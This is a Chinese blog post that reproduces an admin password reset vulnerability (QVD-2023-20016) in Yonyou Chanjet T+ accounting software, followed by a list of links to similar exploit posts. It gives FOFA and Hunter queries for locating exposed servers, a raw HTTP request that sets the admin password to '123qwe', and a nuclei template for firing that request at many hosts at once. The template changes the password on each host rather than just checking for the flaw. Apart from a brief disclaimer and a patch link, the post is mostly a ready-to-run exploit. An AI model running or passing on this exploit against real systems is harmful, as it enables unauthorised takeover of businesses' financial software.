(附nuclei 批量验证文件)用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)

最新推荐文章于 2024-07-26 10:40:43 发布
最新推荐文章于 2024-07-26 10:40:43 发布
阅读量397 收藏 3
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nglj9527/article/details/139302731
版权

(附nuclei 批量验证文件)用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)

2、资产指纹

fofa:app=“畅捷通-TPlus”
hunter: app.name=“畅捷通 T+”

3、漏洞复现

发送以下请求,将重置admin密码为123qwe

POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 45
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

在这里插入图片描述

在这里插入图片描述

4、nuclei yaml文件

id: chanjettplus-recoverpassword

info:
  name: chanjettplus recoverpassword
  author: xxxx
  severity: critical
  description: |
    admin管理员密码修改为123qwe
  tags: chanjettplus

http:
  - raw:
    - |
      POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
      Accept: */*
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Content-Length: 47
      
      {"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1==200 && contains_all(body_1,"true")'

修复方式

及时前往用友官网获取补丁https://security.yonyou.com/#/noticeInfo?id=233

nglj9527
关注
专栏目录
漏洞复现】捷通T+ App_Code.ashx 远程命令执行漏洞
凝聚力安全团队
06-17 872
捷通T+ Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore 接口存在反序列化漏洞,可导致命令执行。被攻击者利用此漏洞可直接接管服务器。
捷通T+ 反序列化漏洞复现(QVD-2023-13615)
0xSec
06-23 4543
捷通 T+ 存在.net反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。
捷通T+密码清除工具
11-01
捷通T+密码清除工具,比直接数据库里修改方便多了。
用友捷通T+Plus存在SSRF漏洞
最新发布
weixin_43167326的博客
07-26 650
用友捷通TPlus移动是集全渠道运营、前后台经营一体化智能商业产品的移动端。是T+专属移动APP。满足商贸、工贸企业的移动办公需求。
用友捷通T+ keyEdit sql注入漏洞
Keepb1ue的博客
05-11 596
捷通 T+ 是一款灵动,智慧,时尚的基于互联网时代开发的管理软件,主要针对中小型工贸与商贸企业,尤其适合有异地多组织机构(多工厂,多仓库,多办事处,多经销商)的企业,涵盖了财务,业务,生产等领域的应用,产品应用功能包括:采购管理、库存管理、销售管理、生产管理、分销管理、零售管理、往来管理、现金银行管理、总账、移动应用等,融入了社交化、移动化、电子商务、互联网信息订阅等元素,为企业打造全新的生意模式、管理模式、工作模式。
捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞
selecthch的博客
03-26 510
捷通TPlus适用于异地多组织、多机构对企业财务汇总的管理需求;全面支持企业对远程仓库、异地办事处的管理需求;全面满足企业财务业务一体化管理需求。其Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore接口存在反序列化漏洞,可导致命令执行。漏洞名称:捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞漏洞类别:远程命令执行漏洞
捷通T+ SQL注入漏洞复现(QVD-2023-13612)
0xSec
06-14 3886
捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
【1day】复现用友捷通T+前台命令执行漏洞
记录并分享学习安全的知识点..
07-07 723
捷通T+是一款主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友 捷通T+ GetStoreWarehouseByStore 存在 .net反序列化漏洞,导致远程命令执行,控制服务器
用友捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞
薛定谔嘚喵博客
08-31 473
1.该系统在DownloadProxy.aspx存在任意文件读取漏洞。 2.用友捷通Tplus存在前台远程代码执行漏洞,攻击者可利用GetStoreWarehouseByStore 方法注入序列化的payload,执行任意命令。最终造成服务器敏感性信息泄露或代码执行。
漏洞复现】用友-捷通T+-Ufida-SQL注入
知黑而守白
01-22 355
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友捷通 T+某模块存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现】用友-捷通T+-App_Code-远程命令执行
知黑而守白
01-22 241
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友捷通 T+某模块存在远程命令执行漏洞。攻击者可以通过构造恶意的数据包,成功注入并执行恶意命令,可能导致系统敏感信息泄露、篡改、服务器接管或其他严重后果。
漏洞复现】用友-捷通T+-SQL注入-keyEdit
知黑而守白
07-05 625
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+ keyEdit.aspx接口处存在SQL注入漏洞 ,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
漏洞复现1day】捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
qq_34780861的博客
03-21 951
捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
nuclei 批量验证文件用友 捷通T+ getdecallusers 存在信息泄露漏洞,可获取系统用户个人信息。
nglj9527的博客
05-29 359
用友 捷通T+ getdecallusers 存在信息泄露漏洞,可获取系统用户个人信息。
捷通T+ KeyInfoList.aspx SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-08 362
捷通T+ KeyInfoList.aspx SQL注入漏洞(含批量验证poc)
漏洞复现--用友 捷通T+ .net反序列化RCE
qq_53003652的博客
10-25 1451
捷通T+是一款新型互联网企业管理软件。全面满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。该产品存在.net反序列化可导致RCE。访问执行命令的日志文件即test.txt。执行ipconfig /all。此脚本来自揽月安全团队。
捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现
la-大白
10-28 3292
捷通T+软件任意文件上传漏洞
0day 未公开 泛微E-Cology 存在源码信息泄露漏洞
weixin_43167326的博客
07-09 1112
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。。
/home/chenly1/wrk/test_project_001_c/download/gcc/bin/../lib/gcc/riscv-nuclei-elf/10.2.0/../../../../riscv-nuclei-elf/bin/ld: spi_write_kernel_b.elf section `.rodata' will not fit in region `ilm' /home/chenly1/wrk/test_project_001_c/download/gcc/bin/../lib/gcc/riscv-nuclei-elf/10.2.0/../../../../riscv-nuclei-elf/bin/ld: region `ilm' overflowed by 13124 bytes /home/chenly1/wrk/test_project_001_c/download/gcc/bin/../lib/gcc/riscv-nuclei-elf/10.2.0/../../../../riscv-nuclei-elf/bin/ld: spi_write_kernel_b.elf section `.rodata' will not fit in region `ilm' /home/chenly1/wrk/test_project_001_c/download/gcc/bin/../lib/gcc/riscv-nuclei-elf/10.2.0/../../../../riscv-nuclei-elf/bin/ld: region `ilm' overflowed by 13124 bytes collect2: error: ld returned 1 exit status make: *** [../../download/hbird-sdk-master/Build/Makefile.rules:72: spi_write_kernel_b.elf] Error 1 collect2: error: ld returned 1 exit status
07-25
这个错误表明在链接过程中,代码中的`.rodata`节(只读数据)无法适应所分配的`ilm`区域,导致溢出。ld命令返回了错误代码1,表示链接失败。 这个问题可能是由于代码中的只读数据太大而引起的。解决这个问题的一种方法是增加`ilm`区域的大小,使其能够容纳`.rodata`节中的数据。你可以尝试调整链接脚本或编译器选项来修改`ilm`区域的大小。 另外,你还可以检查一下代码中是否有过多的只读数据,尝试优化代码以减少只读数据的大小。 如果以上方法都无法解决问题,你可能需要进一步分析代码和链接过程,以找出导致溢出的原因,并相应地调整代码或链接器设置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值